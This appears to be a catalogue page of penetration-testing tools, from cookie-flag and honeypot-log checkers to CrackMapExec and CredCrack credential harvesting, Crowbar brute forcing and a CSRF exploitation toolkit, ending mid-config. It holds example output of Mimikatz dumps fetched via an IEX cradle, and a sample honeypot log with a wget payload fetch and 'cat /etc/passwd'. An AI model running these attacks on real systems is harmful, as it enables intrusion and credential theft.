[+] Hidden login to enter the panel; use ?poraca to find the login
A video with examples of use is available.


Download Cookies Manager
COOKIESCANNER - TOOL TO CHECK THE COOKIE FLAGS FOR MULTIPLE SITES

Tool to make the web scan process easier when checking whether the Secure and HttpOnly flags are enabled in the cookies (path and expires too).

This tool can probe multiple URLs read from an input file, all subdomains of a domain found through a Google search, or a single URL. It also supports multiple output formats such as JSON, XML and CSV.

FEATURES:

Multiple options for output (and export using >): xml, json, csv, grepable
Check the flags in multiple sites by a file input (one per line). This is very useful for pentesters when they want to check the flags in multiple sites.
Google search. Search in Google for all subdomains and check the cookies for each domain.
Colors for the normal output.
USAGE

Usage: cookiescanner.py [options]
Example: ./cookiescanner.py -i ips.txt

Options:
  -h, --help            show this help message and exit
  -i INPUT, --input=INPUT
                        File input with the list of webservers
  -I, --info            More info
  -u URL, --url=URL     URL
  -f FORMAT, --format=FORMAT
                        Output format (json, xml, csv, normal, grepable)
  --nocolor             Disable color (for the normal format output)
  -g GOOGLE, --google=GOOGLE
                        Search in google by domain

REQUIREMENTS
requests >= 2.8.1
BeautifulSoup >= 4.2.1

INSTALL REQUIREMENTS
pip3 install --upgrade -r requirements.txt
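The check cookiescanner automates is a header-parsing job: read each Set-Cookie value, see whether Secure and HttpOnly are present, and report Path and Expires alongside. The following is an added example in that spirit, not the tool's own code; the report fields, function names and the constructed SAMPLE_HEADERS are my own, chosen so the check runs offline and also shows the json/csv/grepable output styles the tool offers.

```python
"""Check Secure / HttpOnly (plus Path and Expires) on Set-Cookie headers.

Added example in the spirit of cookiescanner; not the tool's own code.
The report fields, function names and SAMPLE_HEADERS are constructed
for this illustration so the check can run without network access.
"""
import csv
import io
import json
import urllib.request

# Constructed Set-Cookie values, as an HTTPS site might return them.
SAMPLE_HEADERS = [
    "PHPSESSID=abc123; path=/; HttpOnly",                           # no Secure
    "csrftoken=to=ken; Path=/; Secure; HttpOnly; Expires=Wed, 21 Oct 2016 07:28:00 GMT",
    "tracking=xyz; Max-Age=31536000",                               # neither flag, no Path
]


def parse_set_cookie(header: str) -> dict:
    """Split one Set-Cookie header value into name, value and attributes.
    Attribute names are compared case-insensitively, as browsers do, and a
    '=' inside the cookie value is kept (only the first '=' separates the name)."""
    parts = [p.strip() for p in header.split(";")]
    name, _, value = parts[0].partition("=")
    attrs = {}
    for part in parts[1:]:
        if not part:
            continue
        key, _, val = part.partition("=")
        attrs[key.strip().lower()] = val.strip()
    return {"name": name.strip(), "value": value, "attrs": attrs}


def check_cookie(url: str, header: str) -> dict:
    """One finding per cookie: which of the two protection flags are missing,
    plus the Path and lifetime that cookiescanner also reports."""
    cookie = parse_set_cookie(header)
    attrs = cookie["attrs"]
    if "expires" in attrs:
        lifetime = attrs["expires"]
    elif "max-age" in attrs:
        lifetime = "max-age=" + attrs["max-age"]
    else:
        lifetime = "session"
    missing = [flag for flag in ("secure", "httponly") if flag not in attrs]
    return {
        "url": url,
        "name": cookie["name"],
        "secure": "secure" in attrs,
        "httponly": "httponly" in attrs,
        "path": attrs.get("path", "(default)"),
        "expires": lifetime,
        "missing": missing,
    }


def scan_headers(url: str, set_cookie_headers) -> list:
    """Check every Set-Cookie header one response returned."""
    return [check_cookie(url, h) for h in set_cookie_headers]


def fetch_set_cookie_headers(url: str, timeout: float = 10.0) -> list:
    """Live variant (not used by the offline demo): read the raw Set-Cookie
    headers of one GET response. Raw headers are needed because cookie jars
    drop the attributes this check inspects."""
    with urllib.request.urlopen(url, timeout=timeout) as resp:
        return resp.headers.get_all("Set-Cookie") or []


def format_report(findings: list, fmt: str = "grepable") -> str:
    """Render findings as json, csv or grepable (one tab-separated line per cookie)."""
    if fmt == "json":
        return json.dumps(findings, indent=2)
    if fmt == "csv":
        buf = io.StringIO()
        fields = list(findings[0].keys()) if findings else ["url"]
        writer = csv.DictWriter(buf, fieldnames=fields)
        writer.writeheader()
        for f in findings:
            row = dict(f)
            row["missing"] = " ".join(f["missing"])
            writer.writerow(row)
        return buf.getvalue()
    lines = []
    for f in findings:
        lines.append("%s\t%s\tsecure=%s\thttponly=%s\tpath=%s\texpires=%s\tmissing=%s" % (
            f["url"], f["name"], f["secure"], f["httponly"], f["path"], f["expires"],
            ",".join(f["missing"]) or "-"))
    return "\n".join(lines)


if __name__ == "__main__":
    results = scan_headers("https://example.test/", SAMPLE_HEADERS)
    print(format_report(results))
```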

Download Cookiescanner
COWRIE - SSH HONEYPOT

Cowrie is a medium interaction SSH honeypot designed to log brute force attacks and, most importantly, the entire shell interaction performed by the attacker.
Cowrie is directly based on Kippo by Upi Tamminen (desaster).

Features

Some interesting features:

Fake filesystem with the ability to add/remove files. A full fake filesystem resembling a Debian 5.0 installation is included
Possibility of adding fake file contents so the attacker can 'cat' files such as /etc/passwd. Only minimal file contents are included
Session logs stored in a UML-compatible format for easy replay with original timings
Cowrie saves files downloaded with wget/curl or uploaded with SFTP and scp for later inspection

Additional functionality over standard kippo:

SFTP and SCP support for file upload
Support for SSH exec commands
Logging of direct-tcp connection attempts (ssh proxying)
Logging in JSON format for easy processing in log management solutions
Many, many additional commands

Requirements

Software required:
An operating system (tested on Debian, CentOS, FreeBSD and Windows 7)
Python 2.5+
Twisted 8.0+
PyCrypto
pyasn1
Zope Interface

Files of interest:

dl/ - files downloaded with wget are stored here
log/cowrie.log - log/debug output
log/cowrie.json - transaction output in JSON format
log/tty/ - session logs
utils/playlog.py - utility to replay session logs
utils/createfs.py - used to create fs.pickle
data/fs.pickle - fake filesystem
honeyfs/ - file contents for the fake filesystem - feel free to copy a real system here
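Because Cowrie writes one JSON object per line to log/cowrie.json, the file folds easily into detection logic. The following is an added example and not Cowrie's own code: it summarises a constructed cowrie.json excerpt per source IP and flags the sources a defender would look at first. The event and field names (eventid, src_ip, session, username, password, input) are what I understand Cowrie's JSON format to use; treat them as an assumption and check them against your own log file.

```python
"""Summarise a Cowrie log/cowrie.json file per attacking source IP.

Added example, not part of Cowrie. Event and field names (eventid, src_ip,
session, username, password, input) are assumed to match Cowrie's JSON
log format; SAMPLE_LOG is constructed for this demo, not a real capture.
"""
import json
from collections import defaultdict

SAMPLE_LOG = """\
{"eventid": "cowrie.session.connect", "src_ip": "203.0.113.10", "src_port": 51000, "dst_port": 2222, "session": "s1", "timestamp": "2016-01-10T10:00:00Z"}
{"eventid": "cowrie.login.failed", "src_ip": "203.0.113.10", "username": "root", "password": "123456", "session": "s1", "timestamp": "2016-01-10T10:00:01Z"}
{"eventid": "cowrie.login.failed", "src_ip": "203.0.113.10", "username": "root", "password": "admin", "session": "s1", "timestamp": "2016-01-10T10:00:02Z"}
{"eventid": "cowrie.login.success", "src_ip": "203.0.113.10", "username": "root", "password": "toor", "session": "s1", "timestamp": "2016-01-10T10:00:03Z"}
{"eventid": "cowrie.command.input", "src_ip": "203.0.113.10", "input": "wget http://198.51.100.7/x.sh", "session": "s1", "timestamp": "2016-01-10T10:00:05Z"}
{"eventid": "cowrie.command.input", "src_ip": "203.0.113.10", "input": "cat /etc/passwd", "session": "s1", "timestamp": "2016-01-10T10:00:06Z"}
{"eventid": "cowrie.session.connect", "src_ip": "198.51.100.20", "src_port": 40000, "dst_port": 2222, "session": "s2", "timestamp": "2016-01-10T10:05:00Z"}
{"eventid": "cowrie.login.failed", "src_ip": "198.51.100.20", "username": "admin", "password": "admin", "session": "s2", "timestamp": "2016-01-10T10:05:01Z"}
this line is not JSON and must be skipped, as a truncated line in a live log would be
"""

# Commands that pull a second stage from elsewhere; first match is reported.
DOWNLOAD_MARKERS = ("wget ", "curl ", "tftp ", "ftpget ")


def parse_events(text: str) -> list:
    """Return one dict per well-formed event line; skip blank or non-JSON lines."""
    events = []
    for raw in text.splitlines():
        raw = raw.strip()
        if not raw:
            continue
        try:
            evt = json.loads(raw)
        except ValueError:
            continue  # tolerate partial or corrupted lines
        if isinstance(evt, dict) and "eventid" in evt and "src_ip" in evt:
            events.append(evt)
    return events


def summarise(events: list) -> dict:
    """Aggregate per source IP: sessions, login outcomes, credentials tried, commands."""
    per_ip = defaultdict(lambda: {"sessions": set(), "failed": 0, "success": 0,
                                  "creds": [], "commands": []})
    for e in events:
        s = per_ip[e["src_ip"]]
        if e.get("session"):
            s["sessions"].add(e["session"])
        eid = e["eventid"]
        if eid == "cowrie.login.failed":
            s["failed"] += 1
            s["creds"].append((e.get("username"), e.get("password")))
        elif eid == "cowrie.login.success":
            s["success"] += 1
            s["creds"].append((e.get("username"), e.get("password")))
        elif eid == "cowrie.command.input":
            s["commands"].append(e.get("input", ""))
    return dict(per_ip)


def flag_sources(per_ip: dict, max_failed: int = 3) -> dict:
    """{src_ip: [reasons]} for sources worth a closer look: many failed logins
    (password guessing), a success after failures, or a payload download."""
    flagged = {}
    for ip, s in sorted(per_ip.items()):
        reasons = []
        if s["failed"] >= max_failed:
            reasons.append("%d failed logins" % s["failed"])
        if s["success"] and s["failed"]:
            reasons.append("login succeeded after %d failures" % s["failed"])
        for cmd in s["commands"]:
            if cmd.strip().startswith(DOWNLOAD_MARKERS):
                reasons.append("payload download: " + cmd.strip())
                break
        if reasons:
            flagged[ip] = reasons
    return flagged


def report(per_ip: dict, flagged: dict) -> str:
    """One line per source IP, with the flag reasons appended where present."""
    lines = []
    for ip, s in sorted(per_ip.items()):
        note = "  <-- " + "; ".join(flagged[ip]) if ip in flagged else ""
        lines.append("%s sessions=%d failed=%d success=%d commands=%d%s" % (
            ip, len(s["sessions"]), s["failed"], s["success"], len(s["commands"]), note))
    return "\n".join(lines)


if __name__ == "__main__":
    summary = summarise(parse_events(SAMPLE_LOG))
    print(report(summary, flag_sources(summary)))
```

To run it against a real honeypot, read log/cowrie.json into the text passed to parse_events() and adjust max_failed to your traffic.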

Download Cowrie
CRACKMAPEXEC - A SWISS ARMY KNIFE FOR PENTESTING WINDOWS/ACTIVE DIRECTORY ENVIRONMENTS

CrackMapExec is your one-stop-shop for pentesting Windows/Active Directory environments!

From enumerating logged on users and spidering SMB shares to executing psexec style attacks and auto-injecting Mimikatz into memory using Powershell!

The biggest improvements over the tools it was inspired by (listed in the banner below) are:
Pure Python script, no external tools required
Fully concurrent threading
Uses ONLY native WinAPI calls for discovering sessions, users, dumping SAM hashes etc...
Opsec safe (no binaries are uploaded to dump clear-text credentials, inject shellcode etc...)

Installation on Kali Linux

Run pip install --upgrade -r requirements.txt
Usage
Swiss army knife for pentesting Windows/Active Directory environments | @byt3bl33d3r
Powered by Impacket https://github.com/CoreSecurity/impacket (@agsolino)

Inspired by:
@ShawnDEvans's smbmap https://github.com/ShawnDEvans/smbmap
@gojhonny's CredCrack https://github.com/gojhonny/CredCrack
@pentestgeek's smbexec https://github.com/pentestgeek/smbexec
positional arguments:
  target                The target range, CIDR identifier or file containing targets

optional arguments:
  -h, --help            show this help message and exit
  -t THREADS            Set how many concurrent threads to use
  -u USERNAME           Username, if omitted null session assumed
  -p PASSWORD           Password
  -H HASH               NTLM hash
  -n NAMESPACE          Namespace name (default //./root/cimv2)
  -d DOMAIN             Domain name
  -s SHARE              Specify a share (default: C$)
  -P {139,445}          SMB port (default: 445)
  -v                    Enable verbose output

Credential Gathering:
  Options for gathering credentials
  --sam                 Dump SAM hashes from target systems
  --mimikatz            Run Invoke-Mimikatz on target systems
  --ntds {ninja,vss,drsuapi}
                        Dump the NTDS.dit from target DCs using the specified method (drsuapi is the fastest)

Mapping/Enumeration:
  Options for Mapping/Enumerating
  --shares              List shares
  --sessions            Enumerate active sessions
  --users               Enumerate users
  --lusers              Enumerate logged on users
  --wmi QUERY           Issues the specified WMI query

Account Bruteforcing:
  Options for bruteforcing SMB accounts
  --bruteforce USER_FILE PASS_FILE
                        Your wordlists containing Usernames and Passwords
  --exhaust             Don't stop on first valid account found

Spidering:
  Options for spidering shares
  --spider FOLDER       Folder to spider (defaults to share root dir)
  --pattern PATTERN     Pattern to search for in filenames and folders
  --patternfile PATTERNFILE
                        File containing patterns to search for
  --depth DEPTH         Spider recursion depth (default: 1)

Command Execution:
  Options for executing commands
  --execm {atexec,wmi,smbexec}
                        Method to execute the command (default: smbexec)
  -x COMMAND            Execute the specified command
  -X PS_COMMAND         Execute the specified powershell command

Shellcode/EXE/DLL injection:
  Options for injecting Shellcode/EXE/DLL's using PowerShell
  --inject {exe,shellcode,dll}
                        Inject Shellcode, EXE or a DLL
  --path PATH           Path to the Shellcode/EXE/DLL you want to inject on the target systems
  --procid PROCID       Process ID to inject the Shellcode/EXE/DLL into (if omitted, will inject within the running PowerShell process)
  --exeargs EXEARGS     Arguments to pass to the EXE being reflectively loaded (ignored if not injecting an EXE)

Filesystem interaction:
  Options for interacting with filesystems
  --list PATH           List contents of a directory
  --download PATH       Download a file from the remote systems
  --upload SRC DST      Upload a file to the remote systems
  --delete PATH         Delete a remote file
There's been an awakening... have you felt it?

Examples

The most basic usage: scans the subnet using 100 concurrent threads:

#~ python crackmapexec.py -t 100 172.16.206.0/24
[+] 172.16.206.132:445 is running Windows 6.1 Build 7601 (name:DRUGCOMPANY-PC) (domain:DRUGCOMPANY-PC)
[+] 172.16.206.133:445 is running Windows 6.3 Build 9600 (name:DRUGOUTCOVE-PC) (domain:DRUGOUTCOVE-PC)
[+] 172.16.206.130:445 is running Windows 10.0 Build 10240 (name:DESKTOP-QDVNP6B) (domain:DESKTOP-QDVNP6B)

Let's enumerate available shares:

#~ python crackmapexec.py -t 100 172.16.206.0/24 -u username -p password --shares
[+] 172.16.206.132:445 is running Windows 6.1 Build 7601 (name:DRUGCOMPANY-PC) (domain:DRUGCOMPANY-PC)
[+] 172.16.206.133:445 is running Windows 6.3 Build 9600 (name:DRUGOUTCOVE-PC) (domain:DRUGOUTCOVE-PC)
[+] 172.16.206.130:445 is running Windows 10.0 Build 10240 (name:DESKTOP-QDVNP6B) (domain:DESKTOP-QDVNP6B)
[+] 172.16.206.130:445 DESKTOP-QDVNP6B Available shares:
    SHARE       Permissions
    -----       -----------
    ADMIN$      READ, WRITE
    IPC$        NO ACCESS
    C$          READ, WRITE
[+] 172.16.206.133:445 DRUGOUTCOVE-PC Available shares:
    SHARE       Permissions
    -----       -----------
    Users       READ, WRITE
    ADMIN$      READ, WRITE
    IPC$        NO ACCESS
    C$          READ, WRITE
[+] 172.16.206.132:445 DRUGCOMPANY-PC Available shares:
    SHARE       Permissions
    -----       -----------
    Users       READ, WRITE
    ADMIN$      READ, WRITE
    IPC$        NO ACCESS
    C$          READ, WRITE
Let's execute some commands on all systems concurrently:

#~ python crackmapexec.py -t 100 172.16.206.0/24 -u username -p password -x whoami
[+] 172.16.206.132:445 is running Windows 6.1 Build 7601 (name:DRUGCOMPANY-PC) (domain:DRUGCOMPANY-PC)
[+] 172.16.206.130:445 is running Windows 10.0 Build 10240 (name:DESKTOP-QDVNP6B) (domain:DESKTOP-QDVNP6B)
[+] 172.16.206.132:445 DRUGCOMPANY-PC Executed specified command via SMBEXEC
nt authority\system
[+] 172.16.206.130:445 DESKTOP-QDVNP6B Executed specified command via SMBEXEC
nt authority\system
[+] 172.16.206.133:445 is running Windows 6.3 Build 9600 (name:DRUGOUTCOVE-PC) (domain:DRUGOUTCOVE-PC)
[+] 172.16.206.133:445 DRUGOUTCOVE-PC Executed specified command via SMBEXEC
nt authority\system

Same as above only using WMI as the code execution method:

#~ python crackmapexec.py -t 100 172.16.206.0/24 -u username -p password --execm wmi -x whoami
[+] 172.16.206.132:445 is running Windows 6.1 Build 7601 (name:DRUGCOMPANY-PC) (domain:DRUGCOMPANY-PC)
[+] 172.16.206.133:445 is running Windows 6.3 Build 9600 (name:DRUGOUTCOVE-PC) (domain:DRUGOUTCOVE-PC)
[+] 172.16.206.130:445 is running Windows 10.0 Build 10240 (name:DESKTOP-QDVNP6B) (domain:DESKTOP-QDVNP6B)
[+] 172.16.206.132:445 DRUGCOMPANY-PC Executed specified command via WMI
drugcompany-pc\administrator
[+] 172.16.206.133:445 DRUGOUTCOVE-PC Executed specified command via WMI
drugoutcove-pc\administrator
[+] 172.16.206.130:445 DESKTOP-QDVNP6B Executed specified command via WMI
desktop-qdvnp6b\drugdealer

Use an IEX cradle to run Invoke-Mimikatz.ps1 on all systems concurrently (PS script gets hosted automatically with an HTTP server), Mimikatz's output then gets POST'ed back to our HTTP server, saved to a log file and parsed for clear-text credentials:

#~ python crackmapexec.py -t 100 172.16.206.0/24 -u username -p password --mimikatz
[*] Press CTRL-C at any time to exit
[*] Note: This might take some time on large networks! Go grab a redbull!
[+] 172.16.206.132:445 is running Windows 6.1 Build 7601 (name:DRUGCOMPANY-PC) (domain:DRUGCOMPANY-PC)
[+] 172.16.206.133:445 is running Windows 6.3 Build 9600 (name:DRUGOUTCOVE-PC) (domain:DRUGOUTCOVE-PC)
[+] 172.16.206.130:445 is running Windows 10.0 Build 10240 (name:DESKTOP-QDVNP6B) (domain:DESKTOP-QDVNP6B)
172.16.206.130 - - [19/Aug/2015 18:57:40] "GET /Invoke-Mimikatz.ps1 HTTP/1.1" 200
172.16.206.133 - - [19/Aug/2015 18:57:40] "GET /Invoke-Mimikatz.ps1 HTTP/1.1" 200
172.16.206.132 - - [19/Aug/2015 18:57:41] "GET /Invoke-Mimikatz.ps1 HTTP/1.1" 200
172.16.206.133 - - [19/Aug/2015 18:57:45] "POST / HTTP/1.1" 200
[+] 172.16.206.133 Found plain text creds! Domain: drugoutcove-pc Username: drugdealer Password: IloveMETH!@$
[*] 172.16.206.133 Saved POST data to Mimikatz-172.16.206.133-2015-08-19_18:57:45.log
172.16.206.130 - - [19/Aug/2015 18:57:47] "POST / HTTP/1.1" 200
[*] 172.16.206.130 Saved POST data to Mimikatz-172.16.206.130-2015-08-19_18:57:47.log
172.16.206.132 - - [19/Aug/2015 18:57:48] "POST / HTTP/1.1" 200
[+] 172.16.206.132 Found plain text creds! Domain: drugcompany-PC Username: drugcompany Password: IloveWEED!@#
[+] 172.16.206.132 Found plain text creds! Domain: DRUGCOMPANY-PC Username: drugdealer Password: D0ntDoDrugsKIDS!@#
[*] 172.16.206.132 Saved POST data to Mimikatz-172.16.206.132-2015-08-19_18:57:48.log

Let's spider the C$ share starting from the Users folder for the pattern "password" in all files and directories (concurrently):

#~ python crackmapexec.py -t 150 172.16.206.0/24 -u username -p password --spider Users --depth 10 --pattern password
[+] 172.16.206.132:445 is running Windows 6.1 Build 7601 (name:DRUGCOMPANY-PC) (domain:DRUGCOMPANY-PC)
[+] 172.16.206.133:445 is running Windows 6.3 Build 9600 (name:DRUGOUTCOVE-PC) (domain:DRUGOUTCOVE-PC)
[+] 172.16.206.132:445 DRUGCOMPANY-PC Started spidering
[+] 172.16.206.130:445 is running Windows 10.0 Build 10240 (name:DESKTOP-QDVNP6B) (domain:DESKTOP-QDVNP6B)
[+] 172.16.206.133:445 DRUGOUTCOVE-PC Started spidering
[+] 172.16.206.130:445 DESKTOP-QDVNP6B Started spidering
//172.16.206.132/Users/drugcompany/AppData/Roaming/Microsoft/Windows/Recent/supersecrepasswords.lnk
//172.16.206.132/Users/drugcompany/AppData/Roaming/Microsoft/Windows/Recent/supersecretpasswords.lnk
//172.16.206.132/Users/drugcompany/Desktop/supersecretpasswords.txt
[+] 172.16.206.132:445 DRUGCOMPANY-PC Done spidering (Completed in 7.0349509716)
//172.16.206.133/Users/drugdealerboss/Documents/omgallthepasswords.txt
[+] 172.16.206.133:445 DRUGOUTCOVE-PC Done spidering (Completed in 16.2127850056)
//172.16.206.130/Users/drugdealer/AppData/Roaming/Microsoft/Windows/Recent/superpasswords.txt.lnk
//172.16.206.130/Users/drugdealer/Desktop/superpasswords.txt.txt
[+] 172.16.206.130:445 DESKTOP-QDVNP6B Done spidering (Completed in 38.6000130177)

For all available options, just run: python crackmapexec.py --help

Download CrackMapExec
CREDCRACK - FAST AND STEALTHY CREDENTIAL HARVESTER

CredCrack is a fast and stealthy credential harvester. It exfiltrates credentials recursively in memory and in the clear. Upon completion, CredCrack will parse and output the credentials while identifying any domain administrators obtained. CredCrack also comes with the ability to list and enumerate share access and yes, it is threaded!

CredCrack has been tested and runs with the tools found natively in Kali Linux. CredCrack solely relies on having PowerSploit's "Invoke-Mimikatz.ps1" under the /var/www directory.
Help

usage: credcrack.py [-h] -d DOMAIN -u USER [-f FILE] [-r RHOST] [-es] [-l LHOST] [-t THREADS]

CredCrack - A stealthy credential harvester by Jonathan Broche (@g0jhonny)

optional arguments:
  -h, --help            show this help message and exit
  -f FILE, --file FILE  File containing IPs to harvest creds from. One IP per line.
  -r RHOST, --rhost RHOST
                        Remote host IP to harvest creds from.
  -es, --enumshares     Examine share access on the remote IP(s)
  -l LHOST, --lhost LHOST
                        Local host IP to launch scans from.
  -t THREADS, --threads THREADS
                        Number of threads (default: 10)

Required:
  -d DOMAIN, --domain DOMAIN
                        Domain or Workstation
  -u USER, --user USER  Domain username

Examples:
./credcrack.py -d acme -u bob -f hosts -es
./credcrack.py -d acme -u bob -f hosts -l 192.168.1.102 -t 20

Examples

Enumerating Share Access

./credcrack.py -r 192.168.1.100 -d acme -u bob --es
Password:
-------------------------------------------------------------------
CredCrack v1.0 by Jonathan Broche (@g0jhonny)
-------------------------------------------------------------------
[*] Validating 192.168.1.102
[*] Validating 192.168.1.103
[*] Validating 192.168.1.100

----------------------------------------------------------------
192.168.1.102 - Windows 7 Professional 7601 Service Pack 1
----------------------------------------------------------------
OPEN      \\192.168.1.102\ADMIN$
OPEN      \\192.168.1.102\C$
----------------------------------------------------------------
192.168.1.103 - Windows Vista (TM) Ultimate 6002 Service Pack 2
----------------------------------------------------------------
OPEN      \\192.168.1.103\ADMIN$
OPEN      \\192.168.1.103\C$
CLOSED    \\192.168.1.103\F$
----------------------------------------------------------------
192.168.1.100 - Windows Server 2008 R2 Enterprise 7601 Service Pack 1
----------------------------------------------------------------
CLOSED    \\192.168.1.100\ADMIN$
CLOSED    \\192.168.1.100\C$
OPEN      \\192.168.1.100\NETLOGON
OPEN      \\192.168.1.100\SYSVOL

[*] Done! Completed in 0.8s

Harvesting credentials

./credcrack.py -f hosts -d acme -u bob -l 192.168.1.100
Password:
-------------------------------------------------------------------
CredCrack v1.0 by Jonathan Broche (@g0jhonny)
-------------------------------------------------------------------
[*] Setting up the stage
[*] Validating 192.168.1.102
[*] Validating 192.168.1.103
[*] Querying domain admin group from 192.168.1.102
[*] Harvesting credentials from 192.168.1.102
[*] Harvesting credentials from 192.168.1.103
The loot has arrived...

[*] Host: 192.168.1.102 Domain: ACME User: jsmith Password: Good0ljm1th
[*] Host: 192.168.1.103 Domain: ACME User: daguy Password: P@ssw0rd1!
1 domain administrators found and highlighted in yellow above!
[*] Cleaning up
[*] Done! Loot may be found under /root/CCloot folder
[*] Completed in 11.3s

Download CredCrack
CREDMAP - THE CREDENTIAL MAPPER

Credmap is an open source tool that was created to bring awareness to the dangers of credential reuse. It is capable of testing supplied user credentials on several known websites to test if the password has been reused on any of these.
HELP MENU

Usage: credmap.py --email EMAIL | --user USER | --load LIST [options]

Options:
  -h/--help             show this help message and exit
  -v/--verbose          display extra output information
  -u/--username=USER..  set the username to test with
  -p/--password=PASS..  set the password to test with
  -e/--email=EMAIL      set an email to test with
  -l/--load=LOAD_FILE   load list of credentials in format USER:PASSWORD
  -x/--exclude=EXCLUDE  exclude sites from testing
  -o/--only=ONLY        test only listed sites
  -s/--safe-urls        only test sites that use HTTPS.
  -i/--ignore-proxy     ignore system default HTTP proxy
  --proxy=PROXY         set proxy (e.g. "socks5://192.168.1.2:9050")
  --list                list available sites to test with
EXAMPLES

./credmap.py --username janedoe --email janedoe@email.com
./credmap.py -u johndoe -e johndoe@email.com --exclude "github.com, live.com"
./credmap.py -u johndoe -p abc123 -vvv --only "linkedin.com, facebook.com"
./credmap.py -e janedoe@example.com --verbose --proxy "https://127.0.0.1:8080"
./credmap.py --load list.txt
./credmap.py --list

PREREQUISITES

To get started, you will need Python 2.6+ (previous versions may work as well, however I haven't tested them)
Python 2.6+
Git (Optional)

RUNNING THE PROGRAM

To run credmap, simply execute the main script "credmap.py".

$ python credmap.py -h


Download credmap
CROUTON - CHROMIUM OS UNIVERSAL CHROOT ENVIRONMENT

crouton is a set of scripts that bundle up into an easy-to-use, Chromium OS-centric chroot generator. Currently Ubuntu and Debian are supported (using debootstrap behind the scenes), but "Chromium OS Debian, Ubuntu, and Probably Other Distros Eventually Chroot Environment" doesn't acronymize as well (crodupodece is admittedly pretty fun to say, though).

"crouton"...an acronym?

It stands for ChRomium Os Universal chrooT envirONment ...or something like that. Do capitals really matter if caps-lock has been (mostly) banished, and the keycaps are all lower-case? Moving on...

Who's this for?

Anyone who wants to run straight Linux on their Chromium OS device, and doesn't care about physical security. You're also better off having some knowledge of Linux tools and the command line in case things go funny, but it's not strictly necessary.
What's a chroot?

Like virtualization, chroots provide the guest OS with their own, segregated file system to run in, allowing applications to run in a different binary environment from the host OS. Unlike virtualization, you are not booting a second OS; instead, the guest OS is running using the Chromium OS system. The benefit to this is that there is zero speed penalty since everything is run natively, and you aren't wasting RAM to boot two OSes at the same time. The downside is that you must be running the correct chroot for your hardware, the software must be compatible with Chromium OS's kernel, and machine resources are inextricably tied between the host Chromium OS and the guest OS. What this means is that while the chroot cannot directly access files outside of its view, it can access all of your hardware devices, including the entire contents of memory. A root exploit in your guest OS will essentially have unfettered access to the rest of Chromium OS.
...but hey, you can run TuxRacer!

Prerequisites

You need a device running Chromium OS that has been switched to developer mode.
For instructions on how to do that, go to this Chromium OS wiki page, click on your device model and follow the steps in the Entering Developer Mode section.
Note that developer mode, in its default configuration, is completely insecure, so don't expect a password in your chroot to keep anyone from your data. crouton does support encrypting chroots, but the encryption is only as strong as the quality of your passphrase. Consider this your warning.
It's also highly recommended that you install the crouton extension, which, when combined with the extension or xiwi targets, provides much improved integration with Chromium OS.
That's it! Surprised?
Usage

crouton is a powerful tool, and there are a lot of features, but basic usage is as simple as possible by design.
If you're just here to use crouton, you can grab the latest release from https://goo.gl/fd3zc. Download it, pop open a shell (Ctrl+Alt+T, type shell and hit enter), and run sh ~/Downloads/crouton to see the help text. See the "examples" section for some usage examples.
If you're modifying crouton, you'll probably want to clone or download the repo and then either run installer/main.sh directly, or use make to build your very own crouton. You can also download the latest release, cd into the Downloads folder, and run sh crouton -x to extract out the juicy scripts contained within, but you'll be missing build-time stuff like the Makefile.
crouton uses the concept of "targets" to decide what to install. While you will have apt-get in your chroot, some targets may need minor hacks to avoid issues when running in the chrooted environment. As such, if you expect to want something that is fulfilled by a target, install that target when you make the chroot and you'll have an easier time. Don't worry if you forget to include a target; you can always update the chroot later and add it. You can see the list of available targets by running sh ~/Downloads/crouton -t help.
Once you've set up your chroot, you can easily enter it using the newly-installed enter-chroot command, or one of the target-specific start* commands. Ta-da! That was easy.
Read more here.

Download Crouton
CROWBAR - BRUTE FORCING TOOL FOR PENTESTS

Crowbar (crowbar) is a brute forcing tool that can be used during penetration tests. It is developed to brute force some protocols in a different manner from other popular brute forcing tools. As an example, while most brute forcing tools use a username and password for SSH brute force, Crowbar uses an SSH key. So SSH keys that are obtained during penetration tests can be used to attack other SSH servers.
Currently Crowbar supports:
OpenVPN
SSH private key authentication
VNC key authentication
Remote Desktop Protocol (RDP) with NLA support

Installation

First you should install the dependencies:
# apt-get install openvpn freerdp-x11 vncviewer

Then get the latest version from GitHub:
# git clone https://github.com/galkan/crowbar

Attention: the RDP client depends on your Kali version. It may be xfreerdp for the latest version.

Usage

-h: Shows help menu.
-b: Target service. Crowbar now supports vnckey, openvpn, sshkey, rdp.
-s: Target IP address.
-S: File name which stores target IP addresses.
-u: Username.
-U: File name which stores username list.
-n: Thread count.
-l: File name which stores log. Default file name is crowbar.log, which is located in your current directory.
-o: Output file name which stores the successful attempts.
-c: Password.
-C: File name which stores password list.
-t: Timeout value.
-p: Port number.
-k: Key file full path.
-m: OpenVPN configuration file path.
-d: Run nmap in order to discover whether the target port is open or not, so that you can easily brute force the target using crowbar.
-v: Verbose mode which shows all the attempts including failures.
If you want to see all usage options, please use crowbar --help

Download Crowbar

CSRFT - CROSS SITE REQUEST FORGERIES (EXPLOITATION) TOOLKIT

This project has been developed to exploit CSRF web vulnerabilities and provide you a quick and easy exploitation toolkit. In a few words, this is a simple HTTP server in NodeJS that will communicate with the clients (victims) and send them a payload that will be executed using JavaScript.
This has been developed entirely in NodeJS, and configuration files are in JSON format.
* However, there's a tool in Python in the utils folder that you can use to automate CSRF exploitation. *
This project allows you to perform PoCs (Proofs of Concept) really easily. Let's see how to get/use it.

How to get/use the tool

First, clone it:
$ git clone git@github.com:PaulSec/CSRFT.git

To make this project work, get the latest Node.js version here.
Go in the directory and install all the dependencies:
npm install

Then, launch the server.js:
$ node server.js

Usage will be displayed:
Usage : node server.js <file.json> <port : default 8080>

More information

By default, the server will be launched on port 8080, so you can access it via http://0.0.0.0:8080 .
The JSON file must describe your several attack scenarios. It can be wherever you want on your hard drive.
The index page displayed in the browser is accessible via /views/index.ejs .
You can change it as you want and give the link to your victim.

Different folders : What do they mean ?

The idea is to provide a 'basic' hierarchy (of the folders) for your projects. I made the script quite modular so your configuration files/malicious forms, etc. don't have to be in those folders though. This is more like a good practice/advice for your future projects.
However, here is a little summary of those folders:
conf folder : add your JSON configuration file with your configuration.
exploits folder : add all your *.html files containing your forms
public folder : containing jquery.js and inject.js (script loaded when accessing 0.0.0.0:8080)
views folder : index file and exploit template
dicos : folder containing all your dictionaries for those attacks
lib : libs specific for my project (custom ones)
utils : folder containing utils such as csrft_utils.py which will launch CSRFT directly.
server.js file - the HTTP server

Configuration file templates

GET Request with special value

Here is a basic example of a JSON configuration file that will target www.vulnerable.com. This is a special value because the malicious payload is already in the URL/form.
{
    "audit": {
        "name": "PoC done with Automatic Tool",
        "scenario": [
            {
                "attack": [
                    {
                        "method": "GET",
                        "type_attack": "special_value",
